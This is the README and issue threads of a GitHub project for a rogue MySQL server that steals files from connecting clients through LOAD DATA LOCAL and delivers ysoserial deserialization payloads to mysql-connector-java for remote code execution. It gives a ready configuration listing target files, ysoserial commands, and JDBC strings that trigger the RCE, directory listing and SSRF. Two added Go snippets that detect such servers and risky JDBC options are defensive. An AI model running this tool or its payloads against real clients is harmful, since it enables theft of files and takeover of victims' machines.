rmb122 / rogue_mysql_server

A rogue MySQL server that supports reading files from most MySQL libraries of multiple programming languages.

License: MIT License


Rogue Mysql Server

A malicious MySQL server built on https://github.com/vitessio/vitess that exploits the vulnerability to read files from common MySQL client libraries for Go, PHP, Python, Java, the native command-line client and others.
Stay away from annoying compatibility problems; the tested clients are listed in the table below.

language | library                        | pass
go       | github.com/go-sql-driver/mysql | ✔️
php      | mysqli, pdo                    | ✔️
python   | pymysql                        | ✔️
java     | mysql-connector-java           | ✔️
native   | 10.4.13-MariaDB                | ✔️

If you find it useful, click the 🌟 at the top right to support the author.

Features

  • Compatible with many MySQL clients
  • Can read binary files
  • Saves the files automatically
  • When used as a honeypot, username/password authentication can optionally be enabled
  • Reads the client's ConnAttr, which may contain extra information about the client
  • For mysql-connector-java, when the connection string is under control, the deserialization vulnerability can be used for RCE

Usage

Generate a configuration file template in the current directory; skip this step if you already have a configuration file

./rogue_mysql_server -generate

Run the server using the config.yaml just generated

./rogue_mysql_server

Or specify the configuration path manually

./rogue_mysql_server -config other_config.yaml

Configuration file

Example:

host: 0.0.0.0
port: 3306
# IP and port to listen on.

version_string: "10.4.13-MariaDB-log"
# Server version string reported to the client.

file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot
# Files to read. Note that this does not mean all files in the list are read at once (many client implementations do not support that).
# Instead, each time the client executes a statement, one file is read in list order and saved into the `save_path` directory.

always_read: true
# If true, the server tries to read the file regardless of whether the client flags support for LOAD DATA LOCAL; otherwise it decides based on the client's flag, to keep the client's requests from getting out of sync.

from_database_name: false
# If true, the file to read is taken from the database name set by the client.
# For example, with the connection string `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`
# `/etc/hosts` is read from the client and the `file_list` setting is ignored.

max_file_size: 0
# Maximum size of a file to read (in bytes); content beyond this size is discarded. If <= 0, there is no limit.

auth: false
users:
  - root: root
  - root: password
# Whether to enable authentication. If `false`, any password, or no password at all, logs in.
# If `true`, the username and password must match one of the entries configured below.

jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
# See the section on mysql-connector-java deserialization exploitation
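The always_read option works because the LOCAL INFILE request is a packet the server sends on its own after any query, whether or not the client advertised LOAD DATA LOCAL support. As an added defensive example (not part of this project), the Go function below inspects the first server packet that answers a query and flags a LOCAL INFILE request the client's statement never asked for; the packet bytes are constructed inline.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
)

// loadDataLocal matches the one statement for which a LOCAL INFILE request is legitimate.
var loadDataLocal = regexp.MustCompile(`(?i)^\s*LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE`)

// UnsolicitedInfileRequest inspects the first server packet answering a COM_QUERY.
// If it is a LOCAL INFILE Request (payload byte 0xFB followed by the file name) and
// the query was not LOAD DATA LOCAL INFILE, the file name is returned with flagged=true.
// Framing is the standard 3-byte little-endian payload length plus a 1-byte sequence id.
func UnsolicitedInfileRequest(query string, pkt []byte) (file string, flagged bool, err error) {
	if len(pkt) < 4 {
		return "", false, errors.New("truncated packet header")
	}
	n := int(pkt[0]) | int(pkt[1])<<8 | int(pkt[2])<<16
	if len(pkt)-4 < n {
		return "", false, errors.New("truncated packet payload")
	}
	payload := pkt[4 : 4+n]
	if n == 0 || payload[0] != 0xFB {
		return "", false, nil // OK, ERR or result-set header: not a file request
	}
	file = string(payload[1:])
	return file, !loadDataLocal.MatchString(query), nil
}

// mysqlPacket frames a payload for the constructed sample below.
func mysqlPacket(seq byte, payload []byte) []byte {
	n := len(payload)
	return append([]byte{byte(n), byte(n >> 8), byte(n >> 16), seq}, payload...)
}

func main() {
	// Constructed capture: the client sent SET NAMES utf8mb4 and the server
	// answered with a LOCAL INFILE Request for /etc/passwd.
	pkt := mysqlPacket(1, append([]byte{0xFB}, "/etc/passwd"...))
	file, flagged, err := UnsolicitedInfileRequest("SET NAMES utf8mb4", pkt)
	fmt.Println(file, flagged, err) // /etc/passwd true <nil>
	_, flagged, _ = UnsolicitedInfileRequest("LOAD DATA LOCAL INFILE '/tmp/a.csv' INTO TABLE t", pkt)
	fmt.Println(flagged) // false
}
```

Only the first response packet is inspected on purpose: later row packets in a text result set may also start with 0xFB (a NULL first column), so checking them would produce false positives.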

mysql-connector-java deserialization exploitation

In versions >= 8.0.20 and >= 5.1.49 this vulnerability has been fixed:
https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a865998f64ee5b35b1b
https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f798d506f2

The configuration options related to exploiting the mysql-connector-java deserialization vulnerability are:

jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']

jdbc_exploit enables this feature; when the client is detected to be mysql-connector-j, exploitation happens automatically. Exploitation and file reading cannot both be enabled at the same time: enabling exploitation means the client's files cannot be read.
always_exploit means the client is not checked for being mysql-connector-java; exploitation is always enabled.
ysoserial_command is the command used to generate the deserialization payload.

The connectionAttributes option in the connection string can be used to choose the payload; this option can set arbitrary connection attributes. The server reads the value of the attribute t from the connection attributes to look up the matching payload. If none is specified, the first of the provided payloads is used by default.

For example, using the sample configuration above:
to use cc7 under version 8.x, the connection string is jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

Also note that only the com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor exploitation method is supported; see the table below:

version  | jdbc connection string
8.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password
6.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password
>=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

Also, if you need to read files, mysql-connector-java supports file:// for listing directories (other protocols, such as http for SSRF, work too), but in addition to allowLoadLocalInfile being true, allowUrlInLocalInfile must also be set to true; see here for details.
E.g.

  • the / directory: jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true
  • SSRF to http://127.0.0.1:25565: jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true
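Every connection string in this section depends on the driver being told to allow local or URL file uploads, to deserialize server data, or to load ServerStatusDiffInterceptor. As an added defensive example, not part of this project, the Go function below audits a JDBC URL for exactly those options and for a database name that is really a path or URL (the from_database_name case); the benign URL in main is constructed for contrast.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// AuditJDBCURL flags the mysql-connector-java options a rogue server relies on: local
// file upload, URL upload, deserialization plus the interceptor that feeds it, and a
// database name that is really a path or URL. An empty result means none is present.
func AuditJDBCURL(jdbc string) ([]string, error) {
	u, err := url.Parse(strings.TrimPrefix(jdbc, "jdbc:"))
	if err != nil {
		return nil, err
	}
	q := u.Query()
	var findings []string
	for _, p := range []string{"allowLoadLocalInfile", "allowUrlInLocalInfile", "autoDeserialize"} {
		if strings.EqualFold(q.Get(p), "true") {
			findings = append(findings, p+"=true")
		}
	}
	// 8.x uses queryInterceptors, 5.x/6.x statementInterceptors; the class name is the same.
	for _, p := range []string{"queryInterceptors", "statementInterceptors"} {
		if strings.Contains(q.Get(p), "ServerStatusDiffInterceptor") {
			findings = append(findings, p+" loads ServerStatusDiffInterceptor")
		}
	}
	if strings.EqualFold(q.Get("autoDeserialize"), "true") && q.Get("connectionAttributes") != "" {
		findings = append(findings, "connectionAttributes selects a server-side payload: "+q.Get("connectionAttributes"))
	}
	// u.Path is percent-decoded, so %2fetc%2fhosts and file%3A%2F%2F%2F show their real shape here.
	db := strings.TrimPrefix(u.Path, "/")
	if strings.HasPrefix(db, "/") || strings.Contains(db, "://") {
		findings = append(findings, "database name is a path or URL: "+db)
	}
	return findings, nil
}

func main() {
	for _, s := range []string{
		"jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password",
		"jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true",
		"jdbc:mysql://db.internal:3306/app?useSSL=true", // constructed benign string for contrast
	} {
		f, err := AuditJDBCURL(s)
		fmt.Printf("%d finding(s) err=%v: %q\n", len(f), err, f)
	}
}
```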

Ref

mysql-connector-java exploitation:
https://github.com/fnmsd/MySQL_Fake_Server

MySQL protocol:
https://github.com/mysql/mysql-connector-j
https://github.com/vitessio/vitess
https://github.com/src-d/go-mysql-server
http://scz.617.cn:8/network/202001101612.txt

Contributors

carr0t2, rmb122


Issues

Fails to run on Go 1.15

command-line-arguments

./main.go:194:43: undefined: schemaToFields
./main.go:194:58: undefined: Schema
./main.go:198:37: undefined: rowToSQL
./main.go:198:46: undefined: Row
./main.go:203:18: undefined: getMysqlVars

Files are not read one after another in list order

Configuration: file_list: ["/etc/passwd", "C:/boot.ini"]

When connecting to MySQL with a Windows client, only /etc/passwd is read; when that file does not exist, it does not go on to read the c:/boot.ini file.


Reading a non-existent file makes the program hang

In config.yaml, file_list: ["/etc/passwd", "C:/boot.ini",”xxxxxx“]. When one of the files does not exist, reading it makes the program hang, so the following files cannot be read. I tried skipping it without success; is there a good way to solve this?

time="2021-08-04 14:01:56" level=info msg="Server started at [0.0.0.0:3306]"
time="2021-08-04 14:02:31" level=info msg="New client from addr [[::1]:1037] logged in with username [root], ID [1]"
time="2021-08-04 14:02:31" level=info msg="==== ATTRS ===="
time="2021-08-04 14:02:31" level=info msg="[_thread]: [12980]"
time="2021-08-04 14:02:31" level=info msg="[_platform]: [AMD64]"
time="2021-08-04 14:02:31" level=info msg="[_client_version]: [10.1.46]"
time="2021-08-04 14:02:31" level=info msg="[_os]: [Win64]"
time="2021-08-04 14:02:31" level=info msg="[_client_name]: [libmysql]"
time="2021-08-04 14:02:31" level=info msg="[pid]: [21632]"
time="2021-08-04 14:02:31" level=info msg="==============="
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [SET NAMES utf8mb4]"
time="2021-08-04 14:02:31" level=info msg="Now try to read file [/etc/passwd] from addr [[::1]:1037], ID [1]"
time="2021-08-04 14:02:31" level=info msg="Read failed, file may not exist in client"
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [SHOW VARIABLES LIKE 'lower_case%']"
time="2021-08-04 14:02:31" level=info msg="Now try to read file [C:/boot.ini] from addr [[::1]:1037], ID [1]"
time="2021-08-04 14:02:31" level=info msg="Read failed, file may not exist in client"
time="2021-08-04 14:02:31" level=info msg="Client from addr [[::1]:1037], ID [1] try to query [ SHOW VARIABLES LIKE 'sql_mode']"

Java JDBC 8.0.x cannot read files

The error message is as follows:

Exception in thread "main" java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '/* mysql-connector-java-8.0.17 (Revision: 16a712ddb3f826a1933ab42b0039f7fb9eebc6ec) */SELECT  @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_write_timeout AS net_write_timeout, @@performance_schema AS performance_schema, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@transaction_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout' at line 1
 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:120)
 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:97)
 at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:122)
 at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:827)
 at com.mysql.cj.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:447)
 at com.mysql.cj.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:237)
 at com.mysql.cj.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:199)
 at java.sql.DriverManager.getConnection(DriverManager.java:664)
 at java.sql.DriverManager.getConnection(DriverManager.java:247)
 at Test.main(Test.java:12)

The server log is below; the connection information is visible, but no file is read.

Some libraries are already broken; the project cannot be compiled

go: downloading vitess.io/vitess v3.0.0-rc.3.0.20190602171040-12bfde34629c+incompatible
go: downloading golang.org/x/net v0.0.0-20200602114024-627f9648deb9
rogue_mysql_server imports
vitess.io/vitess/go/sqltypes: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
golang.org/x/net/context: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/bucketpool: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/netutil: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/stats: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/sync2: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/tb: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/binlogdata: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/query: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/replicationdata: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/proto/vtrpc: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/sqlparser: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/vterrors: zip: not a valid zip file
rogue_mysql_server imports
rogue_mysql_server/mysql imports
vitess.io/vitess/go/vt/vttls: zip: not a valid zip file

Compilation failed

mysql/slave_status.go:45:23: unknown field 'SlaveIoRunning' in struct literal of type replicationdata.Status
mysql/slave_status.go:46:24: unknown field 'SlaveSqlRunning' in struct literal of type replicationdata.Status
mysql/slave_status.go:62:31: s.SlaveIoRunning undefined (type *replicationdata.Status has no field or method SlaveIoRunning)
mysql/slave_status.go:63:31: s.SlaveSqlRunning undefined (type *replicationdata.Status has no field or method SlaveSqlRunning)

The vitess library does not have these two fields: https://github.com/vitessio/vitess/blob/master/go/vt/proto/replicationdata/replicationdata.pb.go#L52

no such file or directory

Config read error: open /var/folders/nf/vmh0lyh139n39s3p0t2tbnzr0000gp/T/go-build2643144021/b001/exe/config.yaml: no such file or directory
